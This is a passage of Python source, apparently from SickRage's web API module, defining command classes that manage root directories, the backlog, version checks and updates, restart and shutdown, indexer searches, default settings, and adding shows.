root (parent) directory""},\n },\n ""optionalParameters"": {\n ""default"": {""desc"": ""Make this new location the default root (parent) directory""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", [])\n # optional\n self.default, args = self.check_params(args, kwargs, ""default"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Add a new root (parent) directory to SickRage """"""\n\n self.location = urllib.unquote_plus(self.location)\n location_matched = 0\n index = 0\n\n # disallow adding/setting an invalid dir\n if not ek(os.path.isdir, self.location):\n return _responds(RESULT_FAILURE, msg=""Location is invalid"")\n\n root_dirs = []\n\n if sickbeard.ROOT_DIRS == """":\n self.default = 1\n else:\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n index = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n root_dirs.pop(0)\n # clean up the list - replace %xx escapes by their single-character equivalent\n root_dirs = [urllib.unquote_plus(x) for x in root_dirs]\n for x in root_dirs:\n if x == self.location:\n location_matched = 1\n if self.default == 1:\n index = root_dirs.index(self.location)\n break\n\n if location_matched == 0:\n if self.default == 1:\n root_dirs.insert(0, self.location)\n else:\n root_dirs.append(self.location)\n\n root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs]\n root_dirs_new.insert(0, index)\n root_dirs_new = \'|\'.join(unicode(x) for x in root_dirs_new)\n\n sickbeard.ROOT_DIRS = root_dirs_new\n return _responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directories updated"")\n\n\nclass CMD_SickBeardCheckVersion(ApiCall):\n _help = {""desc"": ""Check if a new version of SickRage is available""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n check_version = CheckVersion()\n needs_update = check_version.check_for_new_version()\n\n data = {\n ""current_version"": {\n ""branch"": check_version.get_branch(),\n ""commit"": check_version.updater.get_cur_commit_hash(),\n ""version"": check_version.updater.get_cur_version(),\n },\n ""latest_version"": {\n ""branch"": check_version.get_branch(),\n ""commit"": check_version.updater.get_newest_commit_hash(),\n ""version"": check_version.updater.get_newest_version(),\n },\n ""commits_offset"": check_version.updater.get_num_commits_behind(),\n ""needs_update"": needs_update,\n }\n\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardCheckScheduler(ApiCall):\n _help = {""desc"": ""Get information about the scheduler""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get information about the scheduler """"""\n my_db = db.DBConnection()\n sql_results = my_db.select(""SELECT last_backlog FROM info"")\n\n backlog_paused = sickbeard.searchQueueScheduler.action.is_backlog_paused() # @UndefinedVariable\n backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress() # @UndefinedVariable\n next_backlog = sickbeard.backlogSearchScheduler.nextRun().strftime(dateFormat).decode(sickbeard.SYS_ENCODING)\n\n data = {""backlog_is_paused"": int(backlog_paused), ""backlog_is_running"": int(backlog_running),\n ""last_backlog"": _ordinal_to_date_form(sql_results[0][""last_backlog""]),\n ""next_backlog"": next_backlog}\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardDeleteRootDir(ApiCall):\n _help = {\n ""desc"": ""Delete a root (parent) directory from SickRage"",\n ""requiredParameters"": {\n ""location"": {""desc"": ""The full path to the root (parent) directory to remove""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Delete a root (parent) directory from SickRage """"""\n if sickbeard.ROOT_DIRS == """":\n return _responds(RESULT_FAILURE, _get_root_dirs(), msg=""No root directories detected"")\n\n new_index = 0\n root_dirs_new = []\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n index = int(root_dirs[0])\n root_dirs.pop(0)\n # clean up the list - replace %xx escapes by their single-character equivalent\n root_dirs = [urllib.unquote_plus(x) for x in root_dirs]\n old_root_dir = root_dirs[index]\n for curRootDir in root_dirs:\n if not curRootDir == self.location:\n root_dirs_new.append(curRootDir)\n else:\n new_index = 0\n\n for curIndex, curNewRootDir in enumerate(root_dirs_new):\n if curNewRootDir is old_root_dir:\n new_index = curIndex\n break\n\n root_dirs_new = [urllib.unquote_plus(x) for x in root_dirs_new]\n if len(root_dirs_new) > 0:\n root_dirs_new.insert(0, new_index)\n root_dirs_new = ""|"".join(unicode(x) for x in root_dirs_new)\n\n sickbeard.ROOT_DIRS = root_dirs_new\n # what if the root dir was not found?\n return _responds(RESULT_SUCCESS, _get_root_dirs(), msg=""Root directory deleted"")\n\n\nclass CMD_SickBeardGetDefaults(ApiCall):\n _help = {""desc"": ""Get SickRage\'s user default configuration value""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get SickRage\'s user default configuration value """"""\n\n any_qualities, best_qualities = _map_quality(sickbeard.QUALITY_DEFAULT)\n\n data = {""status"": statusStrings[sickbeard.STATUS_DEFAULT].lower(),\n ""flatten_folders"": int(sickbeard.FLATTEN_FOLDERS_DEFAULT), ""initial"": any_qualities,\n ""archive"": best_qualities, ""future_show_paused"": int(sickbeard.COMING_EPS_DISPLAY_PAUSED)}\n return _responds(RESULT_SUCCESS, data)\n\n\nclass CMD_SickBeardGetMessages(ApiCall):\n _help = {""desc"": ""Get all messages""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n messages = []\n for cur_notification in ui.notifications.get_notifications(self.rh.request.remote_ip):\n messages.append({""title"": cur_notification.title,\n ""message"": cur_notification.message,\n ""type"": cur_notification.type})\n return _responds(RESULT_SUCCESS, messages)\n\n\nclass CMD_SickBeardGetRootDirs(ApiCall):\n _help = {""desc"": ""Get all root (parent) directories""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get all root (parent) directories """"""\n\n return _responds(RESULT_SUCCESS, _get_root_dirs())\n\n\nclass CMD_SickBeardPauseBacklog(ApiCall):\n _help = {\n ""desc"": ""Pause or un-pause the backlog search"",\n ""optionalParameters"": {\n ""pause "": {""desc"": ""True to pause the backlog search, False to un-pause it""}\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Pause or un-pause the backlog search """"""\n if self.pause:\n sickbeard.searchQueueScheduler.action.pause_backlog() # @UndefinedVariable\n return _responds(RESULT_SUCCESS, msg=""Backlog paused"")\n else:\n sickbeard.searchQueueScheduler.action.unpause_backlog() # @UndefinedVariable\n return _responds(RESULT_SUCCESS, msg=""Backlog un-paused"")\n\n\nclass CMD_SickBeardPing(ApiCall):\n _help = {""desc"": ""Ping SickRage to check if it is running""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Ping SickRage to check if it is running """"""\n if sickbeard.started:\n return _responds(RESULT_SUCCESS, {""pid"": sickbeard.PID}, ""Pong"")\n else:\n return _responds(RESULT_SUCCESS, msg=""Pong"")\n\n\nclass CMD_SickBeardRestart(ApiCall):\n _help = {""desc"": ""Restart SickRage""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Restart SickRage """"""\n if not Restart.restart(sickbeard.PID):\n return _responds(RESULT_FAILURE, msg=\'SickRage can not be restarted\')\n\n return _responds(RESULT_SUCCESS, msg=""SickRage is restarting..."")\n\n\nclass CMD_SickBeardSearchIndexers(ApiCall):\n _help = {\n ""desc"": ""Search for a show with a given name on all the indexers, in a specific language"",\n ""optionalParameters"": {\n ""name"": {""desc"": ""The name of the show you want to search for""},\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n }\n }\n\n def __init__(self, args, kwargs):\n self.valid_languages = sickbeard.indexerApi().config[\'langabbv_to_id\']\n # required\n # optional\n self.name, args = self.check_params(args, kwargs, ""name"", None, False, ""string"", [])\n self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"",\n self.valid_languages.keys())\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, False, ""int"", [])\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Search for a show with a given name on all the indexers, in a specific language """"""\n\n results = []\n lang_id = self.valid_languages[self.lang]\n\n if self.name and not self.indexerid: # only name was given\n for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:\n indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()\n\n if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:\n indexer_api_params[\'language\'] = self.lang\n\n indexer_api_params[\'actors\'] = False\n indexer_api_params[\'custom_ui\'] = classes.AllShowsListUI\n\n t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)\n\n try:\n api_data = t[str(self.name).encode()]\n except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):\n logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING)\n continue\n\n for curSeries in api_data:\n results.append({indexer_ids[_indexer]: int(curSeries[\'id\']),\n ""name"": curSeries[\'seriesname\'],\n ""first_aired"": curSeries[\'firstaired\'],\n ""indexer"": int(_indexer)})\n\n return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id})\n\n elif self.indexerid:\n for _indexer in sickbeard.indexerApi().indexers if self.indexer == 0 else [int(self.indexer)]:\n indexer_api_params = sickbeard.indexerApi(_indexer).api_params.copy()\n\n if self.lang and not self.lang == sickbeard.INDEXER_DEFAULT_LANGUAGE:\n indexer_api_params[\'language\'] = self.lang\n\n indexer_api_params[\'actors\'] = False\n\n t = sickbeard.indexerApi(_indexer).indexer(**indexer_api_params)\n\n try:\n my_show = t[int(self.indexerid)]\n except (sickbeard.indexer_shownotfound, sickbeard.indexer_showincomplete, sickbeard.indexer_error):\n logger.log(u""API :: Unable to find show with id "" + str(self.indexerid), logger.WARNING)\n return _responds(RESULT_SUCCESS, {""results"": [], ""langid"": lang_id})\n\n if not my_show.data[\'seriesname\']:\n logger.log(\n u""API :: Found show with indexerid: "" + str(\n self.indexerid) + "", however it contained no show name"", logger.DEBUG)\n return _responds(RESULT_FAILURE, msg=""Show contains no name, invalid result"")\n\n # found show\n results = [{indexer_ids[_indexer]: int(my_show.data[\'id\']),\n ""name"": unicode(my_show.data[\'seriesname\']),\n ""first_aired"": my_show.data[\'firstaired\'],\n ""indexer"": int(_indexer)}]\n break\n\n return _responds(RESULT_SUCCESS, {""results"": results, ""langid"": lang_id})\n else:\n return _responds(RESULT_FAILURE, msg=""Either a unique id or name is required!"")\n\n\nclass CMD_SickBeardSearchTVDB(CMD_SickBeardSearchIndexers):\n _help = {\n ""desc"": ""Search for a show with a given name on The TVDB, in a specific language"",\n ""optionalParameters"": {\n ""name"": {""desc"": ""The name of the show you want to search for""},\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n }\n }\n\n def __init__(self, args, kwargs):\n CMD_SickBeardSearchIndexers.__init__(self, args, kwargs)\n self.indexerid, args = self.check_params(args, kwargs, ""tvdbid"", None, False, ""int"", [])\n\n\nclass CMD_SickBeardSearchTVRAGE(CMD_SickBeardSearchIndexers):\n """"""\n Deprecated, TVRage is no more.\n """"""\n\n _help = {\n ""desc"":\n ""Search for a show with a given name on TVRage, in a specific language. ""\n ""This command should not longer be used, as TVRage was shut down."",\n ""optionalParameters"": {\n ""name"": {""desc"": ""The name of the show you want to search for""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # Leave this one as APICall so it doesnt try and search anything\n # pylint: disable=W0233,W0231\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n return _responds(RESULT_FAILURE, msg=""TVRage is no more, invalid result"")\n\n\nclass CMD_SickBeardSetDefaults(ApiCall):\n _help = {\n ""desc"": ""Set SickRage\'s user default configuration value"",\n ""optionalParameters"": {\n ""initial"": {""desc"": ""The initial quality of a show""},\n ""archive"": {""desc"": ""The archive quality of a show""},\n ""future_show_paused"": {""desc"": ""True to list paused shows in the coming episode, False otherwise""},\n ""flatten_folders"": {""desc"": ""Flatten sub-folders within the show directory""},\n ""status"": {""desc"": ""Status of missing episodes""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""])\n self.future_show_paused, args = self.check_params(args, kwargs, ""future_show_paused"", None, False, ""bool"", [])\n self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", None, False, ""bool"", [])\n self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"",\n [""wanted"", ""skipped"", ""ignored""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Set SickRage\'s user default configuration value """"""\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n sickbeard.QUALITY_DEFAULT = Quality.combineQualities(i_quality_id, a_quality_id)\n\n if self.status:\n # convert the string status to a int\n for status in statusStrings:\n if statusStrings[status].lower() == str(self.status).lower():\n self.status = status\n break\n # this should be obsolete because of the above\n if self.status not in statusStrings:\n raise ApiError(""Invalid Status"")\n # only allow the status options we want\n if int(self.status) not in (3, 5, 6, 7):\n raise ApiError(""Status Prohibited"")\n sickbeard.STATUS_DEFAULT = self.status\n\n if self.flatten_folders is not None:\n sickbeard.FLATTEN_FOLDERS_DEFAULT = int(self.flatten_folders)\n\n if self.future_show_paused is not None:\n sickbeard.COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused)\n\n return _responds(RESULT_SUCCESS, msg=""Saved defaults"")\n\n\nclass CMD_SickBeardShutdown(ApiCall):\n _help = {""desc"": ""Shutdown SickRage""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Shutdown SickRage """"""\n if not Shutdown.stop(sickbeard.PID):\n return _responds(RESULT_FAILURE, msg=\'SickRage can not be shut down\')\n\n return _responds(RESULT_SUCCESS, msg=""SickRage is shutting down..."")\n\n\nclass CMD_SickBeardUpdate(ApiCall):\n _help = {""desc"": ""Update SickRage to the latest version available""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n check_version = CheckVersion()\n\n if check_version.check_for_new_version():\n if check_version.run_backup_if_safe():\n check_version.update()\n\n return _responds(RESULT_SUCCESS, msg=""SickRage is updating ..."")\n\n return _responds(RESULT_FAILURE, msg=""SickRage could not backup config ..."")\n\n return _responds(RESULT_FAILURE, msg=""SickRage is already up to date"")\n\n\nclass CMD_Show(ApiCall):\n _help = {\n ""desc"": ""Get detailed information about a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get detailed information about a show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n show_dict = {\n ""season_list"": CMD_ShowSeasonList((), {""indexerid"": self.indexerid}).run()[""data""],\n ""cache"": CMD_ShowCache((), {""indexerid"": self.indexerid}).run()[""data""]\n }\n\n genre_list = []\n if show_obj.genre:\n genre_list_tmp = show_obj.genre.split(""|"")\n for genre in genre_list_tmp:\n if genre:\n genre_list.append(genre)\n\n show_dict[""genre""] = genre_list\n show_dict[""quality""] = get_quality_string(show_obj.quality)\n\n any_qualities, best_qualities = _map_quality(show_obj.quality)\n show_dict[""quality_details""] = {""initial"": any_qualities, ""archive"": best_qualities}\n\n try:\n show_dict[""location""] = show_obj.location\n except ShowDirectoryNotFoundException:\n show_dict[""location""] = """"\n\n show_dict[""language""] = show_obj.lang\n show_dict[""show_name""] = show_obj.name\n show_dict[""paused""] = (0, 1)[show_obj.paused]\n show_dict[""subtitles""] = (0, 1)[show_obj.subtitles]\n show_dict[""air_by_date""] = (0, 1)[show_obj.air_by_date]\n show_dict[""flatten_folders""] = (0, 1)[show_obj.flatten_folders]\n show_dict[""sports""] = (0, 1)[show_obj.sports]\n show_dict[""anime""] = (0, 1)[show_obj.anime]\n show_dict[""airs""] = str(show_obj.airs).replace(\'am\', \' AM\').replace(\'pm\', \' PM\').replace(\' \', \' \')\n show_dict[""dvdorder""] = (0, 1)[show_obj.dvdorder]\n\n if show_obj.rls_require_words:\n show_dict[""rls_require_words""] = show_obj.rls_require_words.split("", "")\n else:\n show_dict[""rls_require_words""] = []\n\n if show_obj.rls_ignore_words:\n show_dict[""rls_ignore_words""] = show_obj.rls_ignore_words.split("", "")\n else:\n show_dict[""rls_ignore_words""] = []\n\n show_dict[""scene""] = (0, 1)[show_obj.scene]\n show_dict[""archive_firstmatch""] = (0, 1)[show_obj.archive_firstmatch]\n\n show_dict[""indexerid""] = show_obj.indexerid\n show_dict[""tvdbid""] = helpers.mapIndexersToShow(show_obj)[1]\n show_dict[""imdbid""] = show_obj.imdbid\n\n show_dict[""network""] = show_obj.network\n if not show_dict[""network""]:\n show_dict[""network""] = """"\n show_dict[""status""] = show_obj.status\n\n if helpers.tryInt(show_obj.nextaired, 1) > 693595:\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(show_obj.nextaired, show_dict[\'airs\'], show_dict[\'network\']))\n show_dict[\'airs\'] = sbdatetime.sbdatetime.sbftime(dt_episode_airs, t_preset=timeFormat).lstrip(\'0\').replace(\n \' 0\', \' \')\n show_dict[\'next_ep_airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n show_dict[\'next_ep_airdate\'] = \'\'\n\n return _responds(RESULT_SUCCESS, show_dict)\n\n\nclass CMD_ShowAddExisting(ApiCall):\n _help = {\n ""desc"": ""Add an existing show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n ""location"": {""desc"": ""Full path to the existing shows\'s folder""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""initial"": {""desc"": ""The initial quality of the show""},\n ""archive"": {""desc"": ""The archive quality of the show""},\n ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""},\n ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, """", [])\n self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", [])\n # optional\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""])\n self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"",\n bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", [])\n self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", int(sickbeard.USE_SUBTITLES),\n False, ""int"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Add an existing show in SickRage """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if show_obj:\n return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in the database"")\n\n if not ek(os.path.isdir, self.location):\n return _responds(RESULT_FAILURE, msg=\'Not a valid location\')\n\n indexer_name = None\n indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()\n\n if indexer_result[\'result\'] == result_type_map[RESULT_SUCCESS]:\n if not indexer_result[\'data\'][\'results\']:\n return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"")\n if len(indexer_result[\'data\'][\'results\']) == 1 and \'name\' in indexer_result[\'data\'][\'results\'][0]:\n indexer_name = indexer_result[\'data\'][\'results\'][0][\'name\']\n\n if not indexer_name:\n return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"")\n\n # set indexer so we can pass it along when adding show to SR\n indexer = indexer_result[\'data\'][\'results\'][0][\'indexer\']\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n # use default quality as a fail-safe\n new_quality = int(sickbeard.QUALITY_DEFAULT)\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n new_quality = Quality.combineQualities(i_quality_id, a_quality_id)\n\n sickbeard.showQueueScheduler.action.addShow(\n int(indexer), int(self.indexerid), self.location, default_status=sickbeard.STATUS_DEFAULT,\n quality=new_quality, flatten_folders=int(self.flatten_folders), subtitles=self.subtitles,\n default_status_after=sickbeard.STATUS_DEFAULT_AFTER, archive=self.archive_firstmatch\n )\n\n return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"")\n\n\nclass CMD_ShowAddNew(ApiCall):\n _help = {\n ""desc"": ""Add a new show to SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""initial"": {""desc"": ""The initial quality of the show""},\n ""location"": {""desc"": ""The path to the folder where the show should be created""},\n ""archive"": {""desc"": ""The archive quality of the show""},\n ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""},\n ""status"": {""desc"": ""The status of missing episodes""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""},\n ""anime"": {""desc"": ""True to mark the show as an anime, False otherwise""},\n ""scene"": {""desc"": ""True if episodes search should be made by scene numbering, False otherwise""},\n ""future_status"": {""desc"": ""The status of future episodes""},\n ""archive_firstmatch"": {\n ""desc"": ""True if episodes should be archived when first match is downloaded, False otherwise""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n self.valid_languages = sickbeard.indexerApi().config[\'langabbv_to_id\']\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.location, args = self.check_params(args, kwargs, ""location"", None, False, ""string"", [])\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""])\n self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"",\n bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", [])\n self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"",\n [""wanted"", ""skipped"", ""ignored""])\n self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"",\n self.valid_languages.keys())\n self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", bool(sickbeard.USE_SUBTITLES),\n False, ""bool"", [])\n self.anime, args = self.check_params(args, kwargs, ""anime"", bool(sickbeard.ANIME_DEFAULT), False,\n ""bool"", [])\n self.scene, args = self.check_params(args, kwargs, ""scene"", bool(sickbeard.SCENE_DEFAULT), False,\n ""bool"", [])\n self.future_status, args = self.check_params(args, kwargs, ""future_status"", None, False, ""string"",\n [""wanted"", ""skipped"", ""ignored""])\n self.archive_firstmatch, args = self.check_params(args, kwargs, ""archive_firstmatch"",\n bool(sickbeard.ARCHIVE_DEFAULT), False, ""bool"", [])\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Add a new show to SickRage """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if show_obj:\n return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in database"")\n\n if not self.location:\n if sickbeard.ROOT_DIRS != """":\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n root_dirs.pop(0)\n default_index = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n self.location = root_dirs[default_index]\n else:\n return _responds(RESULT_FAILURE, msg=""Root directory is not set, please provide a location"")\n\n if not ek(os.path.isdir, self.location):\n return _responds(RESULT_FAILURE, msg=""\'"" + self.location + ""\' is not a valid location"")\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n # use default quality as a fail-safe\n new_quality = int(sickbeard.QUALITY_DEFAULT)\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n new_quality = Quality.combineQualities(i_quality_id, a_quality_id)\n\n # use default status as a fail-safe\n new_status = sickbeard.STATUS_DEFAULT\n if self.status:\n # convert the string status to a int\n for status in statusStrings:\n if statusStrings[status].lower() == str(self.status).lower():\n self.status = status\n break\n\n if self.status not in statusStrings:\n raise ApiError(""Invalid Status"")\n\n # only allow the status options we want\n if int(self.status) not in (WANTED, SKIPPED, IGNORED):\n return _responds(RESULT_FAILURE, msg=""Status prohibited"")\n new_status = self.status\n\n # use default status as a fail-safe\n default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER\n if self.future_status:\n # convert the string status to a int\n for status in statusStrings:\n if statusStrings[status].lower() == str(self.future_status).lower():\n self.future_status = status\n break\n\n if self.future_status not in statusStrings:\n raise ApiError(""Invalid Status"")\n\n # only allow the status options we want\n if int(self.future_status) not in (WANTED, SKIPPED, IGNORED):\n return _responds(RESULT_FAILURE, msg=""Status prohibited"")\n default_ep_status_after = self.future_status\n\n indexer_name = None\n indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()\n\n if indexer_result[\'result\'] == result_type_map[RESULT_SUCCESS]:\n if not indexer_result[\'data\'][\'results\']:\n return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"")\n if len(indexer_result[\'data\'][\'results\']) == 1 and \'name\' in indexer_result[\'data\'][\'results\'][0]:\n indexer_name = indexer_result[\'data\'][\'results\'][0][\'name\']\n\n if not indexer_name:\n return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"")\n\n # set indexer for found show 